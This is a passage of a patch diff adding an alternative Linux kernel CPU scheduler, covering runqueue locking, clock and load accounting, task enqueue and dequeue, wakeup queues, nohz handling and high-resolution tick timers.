-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compile should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does however cause some slight miss-attribution of {soft,}irq
-+	 * time, a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * Tick may be needed by tasks in the runqueue depending on their policy and
-+ * requirements. If tick is needed, lets send the target an IPI to kick it out
-+ * of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	sched_info_dequeue(rq, p);						\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg based fetch_or, macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
-+
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task, if ->wake_q is !nil already it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
-+
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means the setting of the need_resched flag, on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power-savings.
-+ *
-+ * We don't do similar optimization for completely idle system, as
-+ * selecting an idle CPU will add more delays to the timers than intended
-+ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
-+ */
-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	trace_sched_migrate_task(p, new_cpu);
-+
-+	if (task_cpu(p) != new_cpu)
-+	{
-+		rseq_migrate(p);
-+		perf_event_task_migrate(p);
-+	}
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
